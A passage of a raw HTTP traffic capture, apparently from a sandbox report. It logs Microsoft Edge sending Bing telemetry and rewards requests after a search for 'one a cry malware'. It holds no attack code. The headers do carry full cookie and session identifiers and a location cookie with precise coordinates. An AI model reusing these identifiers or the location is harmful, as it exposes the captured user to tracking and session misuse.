set-cookie: bm_sv=; expires=Thu, 01-Jan-1970 08:00:00 GMT; path=/; secure; SameSite=None
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199030.14913371
GET

https://www.bing.com/images/sbi?mmasync=1&ig=B7E570A9AE8C45A28F4A27F1C0C7A0D7&iid=.5098&ptn=Web&ep=0&iconpl=1

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /images/sbi?mmasync=1&ig=B7E570A9AE8C45A28F4A27F1C0C7A0D7&iid=.5098&ptn=Web&ep=0&iconpl=1 HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=one+a+cry+malware&FORM=AWRE
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:46.2911371+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-10-17
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=3&RB=0&GB=0&RG=200&RP=0
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210347
cookie: ipv6=hit=1729202627525&t=4
cookie: bm_sv=DE1BAE809C3BB39BA4C720F959BCB395~YAAQwnd7XFaoJoySAQAATjxLnBlxCHeTPAuJ+2E8KX4UPJL8fjGlWbleHQrsTckqsOLTAcrpUMpeYW4YKBhkI7uNrxvpERx85lAtdCelv+Xy0V5hSjFG1HZQmfcvRhNlYdQXLNKem5gvH9iKPJPttZVx+Z9vJ0QBDvP1YygNcTw35m4haIGW4Ujsg9GRXVY8Gr5yEMprIZHo4FDqP5drqVsOzIAuTOS5D2Z7RLXdYSQ22lYHPN0OG5Cd7YUhEA==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3732&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199026&WTS=63864795824

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Thu, 17 Oct 2024 21:03:50 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199030.14913398
POST

https://www.bing.com/rewardsapp/ncheader?ver=50503842&IID=SERP.5055&IG=B7E570A9AE8C45A28F4A27F1C0C7A0D7

msedge.exe

Remote address:

92.123.128.172:443

Request

POST /rewardsapp/ncheader?ver=50503842&IID=SERP.5055&IG=B7E570A9AE8C45A28F4A27F1C0C7A0D7 HTTP/2.0
host: www.bing.com
content-length: 4
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
content-type: application/x-www-form-urlencoded
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=one+a+cry+malware&FORM=AWRE
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _C_Auth=
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:46.2911371+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-10-17
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=3&RB=0&GB=0&RG=200&RP=0
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210347
cookie: ipv6=hit=1729202627525&t=4
cookie: bm_sv=DE1BAE809C3BB39BA4C720F959BCB395~YAAQwnd7XFaoJoySAQAATjxLnBlxCHeTPAuJ+2E8KX4UPJL8fjGlWbleHQrsTckqsOLTAcrpUMpeYW4YKBhkI7uNrxvpERx85lAtdCelv+Xy0V5hSjFG1HZQmfcvRhNlYdQXLNKem5gvH9iKPJPttZVx+Z9vJ0QBDvP1YygNcTw35m4haIGW4Ujsg9GRXVY8Gr5yEMprIZHo4FDqP5drqVsOzIAuTOS5D2Z7RLXdYSQ22lYHPN0OG5Cd7YUhEA==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3732&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199026&WTS=63864795824

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Thu, 17 Oct 2024 21:03:50 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199030.14913396
GET

https://www.bing.com/fd/ls/l?IG=B7E570A9AE8C45A28F4A27F1C0C7A0D7&TYPE=Event.ClientInst&DATA=%5B%7B%22width%22%3A%221280%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199029301%2C%22Name%22%3A%22M%22%2C%22FID%22%3A%22BRW%22%7D%2C%7B%22height%22%3A%22601%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199029303%2C%22Name%22%3A%22S%22%2C%22FID%22%3A%22BRH%22%7D%2C%7B%22RawDPR%22%3A%221.0%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199029309%2C%22Name%22%3A%221.0%22%2C%22FID%22%3A%22DPR%22%7D%2C%7B%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199029316%2C%22Name%22%3A%22VisibleOrDelayed%22%2C%22FID%22%3A%22BottomBanner%22%7D%2C%7B%22ID%22%3A%2263245%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199029316%2C%22Name%22%3A%22BottomBanner%22%2C%22FID%22%3A%22Mcp%22%7D%2C%7B%22T%22%3A%22CI.BNP%22%2C%22TS%22%3A1729199029316%2C%22Name%22%3A%22bnp.notif.shown%22%2C%22FID%22%3A%2263245%22%7D%2C%7B%22T%22%3A%22CI.BNP%22%2C%22TS%22%3A1729199029317%2C%22Name%22%3A%22InitializationStarted%22%2C%22FID%22%3A%2263245%22%7D%2C%7B%22T%22%3A%22CI.BNP%22%2C%22TS%22%3A1729199029317%2C%22Name%22%3A%22bnp.embed.ready%22%2C%22FID%22%3A%2263245%22%7D%2C%7B%22ID%22%3A%2263245%22%2C%22T%22%3A%22CI.BNPUxAssetIndex%22%2C%22TS%22%3A1729199029317%2C%22Name%22%3A0%2C%22FID%22%3A%22BNP%22%7D%2C%7B%22T%22%3A%22CI.BNP%22%2C%22TS%22%3A1729199029320%2C%22Name%22%3A1263%2C%22FID%22%3A%22ViewPortWidth%22%7D%2C%7B%22T%22%3A%22CI.BNP%22%2C%22TS%22%3A1729199029320%2C%22Name%22%3A%22OfferIdMissing%22%2C%22FID%22%3A%22BNPOfferId%22%7D%2C%7B%22correlationId%22%3A%2267117bb59e794115ad134ed831df8820%22%2C%22T%22%3A%22CI.acclink%22%2C%22TS%22%3A1729199029762%2C%22Name%22%3A%22loadJsModule%22%2C%22FID%22%3A%22init%22%7D%2C%7B%22correlationId%22%3A%2267117bb59e794115ad134ed831df8820%22%2C%22T%22%3A%22CI.acclink%22%2C%22TS%22%3A1729199029762%2C%22Name%22%3A%22undirectflow%22%2C%22FID%22%3A%22init%22%7D%5D

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /fd/ls/l?IG=B7E570A9AE8C45A28F4A27F1C0C7A0D7&TYPE=Event.ClientInst&DATA=%5B%7B%22width%22%3A%221280%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199029301%2C%22Name%22%3A%22M%22%2C%22FID%22%3A%22BRW%22%7D%2C%7B%22height%22%3A%22601%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199029303%2C%22Name%22%3A%22S%22%2C%22FID%22%3A%22BRH%22%7D%2C%7B%22RawDPR%22%3A%221.0%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199029309%2C%22Name%22%3A%221.0%22%2C%22FID%22%3A%22DPR%22%7D%2C%7B%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199029316%2C%22Name%22%3A%22VisibleOrDelayed%22%2C%22FID%22%3A%22BottomBanner%22%7D%2C%7B%22ID%22%3A%2263245%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199029316%2C%22Name%22%3A%22BottomBanner%22%2C%22FID%22%3A%22Mcp%22%7D%2C%7B%22T%22%3A%22CI.BNP%22%2C%22TS%22%3A1729199029316%2C%22Name%22%3A%22bnp.notif.shown%22%2C%22FID%22%3A%2263245%22%7D%2C%7B%22T%22%3A%22CI.BNP%22%2C%22TS%22%3A1729199029317%2C%22Name%22%3A%22InitializationStarted%22%2C%22FID%22%3A%2263245%22%7D%2C%7B%22T%22%3A%22CI.BNP%22%2C%22TS%22%3A1729199029317%2C%22Name%22%3A%22bnp.embed.ready%22%2C%22FID%22%3A%2263245%22%7D%2C%7B%22ID%22%3A%2263245%22%2C%22T%22%3A%22CI.BNPUxAssetIndex%22%2C%22TS%22%3A1729199029317%2C%22Name%22%3A0%2C%22FID%22%3A%22BNP%22%7D%2C%7B%22T%22%3A%22CI.BNP%22%2C%22TS%22%3A1729199029320%2C%22Name%22%3A1263%2C%22FID%22%3A%22ViewPortWidth%22%7D%2C%7B%22T%22%3A%22CI.BNP%22%2C%22TS%22%3A1729199029320%2C%22Name%22%3A%22OfferIdMissing%22%2C%22FID%22%3A%22BNPOfferId%22%7D%2C%7B%22correlationId%22%3A%2267117bb59e794115ad134ed831df8820%22%2C%22T%22%3A%22CI.acclink%22%2C%22TS%22%3A1729199029762%2C%22Name%22%3A%22loadJsModule%22%2C%22FID%22%3A%22init%22%7D%2C%7B%22correlationId%22%3A%2267117bb59e794115ad134ed831df8820%22%2C%22T%22%3A%22CI.acclink%22%2C%22TS%22%3A1729199029762%2C%22Name%22%3A%22undirectflow%22%2C%22FID%22%3A%22init%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=one+a+cry+malware&FORM=AWRE
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:46.2911371+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-10-17
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=3&RB=0&GB=0&RG=200&RP=0
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210347
cookie: ipv6=hit=1729202627525&t=4
cookie: bm_sv=DE1BAE809C3BB39BA4C720F959BCB395~YAAQwnd7XFaoJoySAQAATjxLnBlxCHeTPAuJ+2E8KX4UPJL8fjGlWbleHQrsTckqsOLTAcrpUMpeYW4YKBhkI7uNrxvpERx85lAtdCelv+Xy0V5hSjFG1HZQmfcvRhNlYdQXLNKem5gvH9iKPJPttZVx+Z9vJ0QBDvP1YygNcTw35m4haIGW4Ujsg9GRXVY8Gr5yEMprIZHo4FDqP5drqVsOzIAuTOS5D2Z7RLXdYSQ22lYHPN0OG5Cd7YUhEA==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3732&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199026&WTS=63864795824

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Thu, 17 Oct 2024 21:03:50 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199030.14913386
GET

https://www.bing.com/fd/ls/l?IG=B7E570A9AE8C45A28F4A27F1C0C7A0D7&TYPE=Event.ClientInst&DATA=%5B%7B%22Time%22%3A1184%2C%22time%22%3A1186%2C%22T%22%3A%22CI.Latency%22%2C%22TS%22%3A1729199029784%2C%22Name%22%3A%22Loaded%22%2C%22FID%22%3A%22HP%22%7D%5D

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /fd/ls/l?IG=B7E570A9AE8C45A28F4A27F1C0C7A0D7&TYPE=Event.ClientInst&DATA=%5B%7B%22Time%22%3A1184%2C%22time%22%3A1186%2C%22T%22%3A%22CI.Latency%22%2C%22TS%22%3A1729199029784%2C%22Name%22%3A%22Loaded%22%2C%22FID%22%3A%22HP%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=one+a+cry+malware&FORM=AWRE
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:46.2911371+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-10-17
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=3&RB=0&GB=0&RG=200&RP=0
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210347
cookie: ipv6=hit=1729202627525&t=4
cookie: bm_sv=DE1BAE809C3BB39BA4C720F959BCB395~YAAQwnd7XFaoJoySAQAATjxLnBlxCHeTPAuJ+2E8KX4UPJL8fjGlWbleHQrsTckqsOLTAcrpUMpeYW4YKBhkI7uNrxvpERx85lAtdCelv+Xy0V5hSjFG1HZQmfcvRhNlYdQXLNKem5gvH9iKPJPttZVx+Z9vJ0QBDvP1YygNcTw35m4haIGW4Ujsg9GRXVY8Gr5yEMprIZHo4FDqP5drqVsOzIAuTOS5D2Z7RLXdYSQ22lYHPN0OG5Cd7YUhEA==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3732&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199026&WTS=63864795824

Response

HTTP/2.0 200

content-length: 1036
content-type: text/html; charset=utf-8
cache-control: no-cache
content-encoding: gzip
expires: -1
pragma: no-cache
vary: Accept-Encoding
x-eventid: 67117bb6dca34e59861d9254f30cd4e4
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-szD4GFt4eaxrLaQGUnSoAvGAxLOgUKIM/Hgvzzd63dw='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
x-ceto-ref: 67117bb6dca34e59861d9254f30cd4e4|AFD:67117bb6dca34e59861d9254f30cd4e4|2024-10-17T21:03:50.487Z
date: Thu, 17 Oct 2024 21:03:50 GMT
set-cookie: _C_ETH=1; expires=Wed, 16 Oct 2024 21:03:50 GMT; domain=.bing.com; path=/; secure; httponly
set-cookie: _C_Auth=
set-cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; domain=.bing.com; expires=Fri, 17-Oct-2025 21:03:50 GMT; path=/; secure; SameSite=None
set-cookie: _Rwho=u=d&ts=2024-10-17; domain=.bing.com; path=/; secure; HttpOnly; SameSite=None
set-cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3; domain=.bing.com; path=/; secure; SameSite=None
set-cookie: bm_sv=; domain=.bing.com; expires=Thu, 01-Jan-1970 08:00:00 GMT; path=/; secure; SameSite=None
set-cookie: bm_sv=; expires=Thu, 01-Jan-1970 08:00:00 GMT; path=/; secure; SameSite=None
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199030.1491339a
GET

https://www.bing.com/fd/ls/l?IG=B7E570A9AE8C45A28F4A27F1C0C7A0D7&TYPE=Event.ClientInst&DATA=%5B%7B%22comp%22%3A%22loaded%22%2C%22time%22%3A1187%2C%22T%22%3A%22CI.Data%22%2C%22TS%22%3A1729199029785%2C%22Name%22%3A%22speech%22%2C%22FID%22%3A%22HP%22%7D%5D

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /fd/ls/l?IG=B7E570A9AE8C45A28F4A27F1C0C7A0D7&TYPE=Event.ClientInst&DATA=%5B%7B%22comp%22%3A%22loaded%22%2C%22time%22%3A1187%2C%22T%22%3A%22CI.Data%22%2C%22TS%22%3A1729199029785%2C%22Name%22%3A%22speech%22%2C%22FID%22%3A%22HP%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=one+a+cry+malware&FORM=AWRE
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _C_ETH=1
